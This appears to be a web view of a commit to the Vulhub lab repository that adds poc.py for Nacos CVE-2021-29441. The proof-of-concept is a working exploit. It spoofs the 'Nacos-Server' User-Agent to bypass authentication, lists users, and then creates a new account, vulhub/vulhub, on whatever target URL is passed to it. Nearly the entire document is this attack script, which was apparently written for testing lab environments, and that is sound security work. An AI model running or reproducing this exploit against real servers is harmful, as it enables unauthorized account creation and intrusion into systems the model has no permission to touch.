first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
40
nacos/CVE-2021-29441/poc.py
Normal file
40
nacos/CVE-2021-29441/poc.py
Normal file
@@ -0,0 +1,40 @@
|
||||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
import sys
|
||||
|
||||
import requests
|
||||
|
||||
headers = {
|
||||
"User-Agent": "Nacos-Server"
|
||||
}
|
||||
|
||||
|
||||
def check(target):
|
||||
endpoint = "/nacos/v1/auth/users?pageNo=1&pageSize=9"
|
||||
r = requests.get(target.strip("/") + endpoint, headers=headers)
|
||||
if r.status_code == 200 and "pageItems" in r.text:
|
||||
print target + " has vulnerabilities"
|
||||
return True
|
||||
print target + "has not vulnerabilities"
|
||||
return False
|
||||
|
||||
|
||||
def add_user(target):
|
||||
add_user_endpoint = "/nacos/v1/auth/users?username=vulhub&password=vulhub"
|
||||
|
||||
r = requests.post(target.strip("/") + add_user_endpoint, headers=headers)
|
||||
if r.status_code == 200 and "create user ok" in r.text:
|
||||
print "Add User Success"
|
||||
print "New User Info: vulhub/vulhub"
|
||||
print "Nacos Login Endpoint: {}/nacos/".format(target)
|
||||
exit(1)
|
||||
|
||||
print "Add User Failed"
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
if len(sys.argv) != 2:
|
||||
print "Please specify the target: python poc.py http://xxxxx:8848"
|
||||
exit(-1)
|
||||
if check(sys.argv[1]):
|
||||
add_user(sys.argv[1])
|
||||
Reference in New Issue
Block a user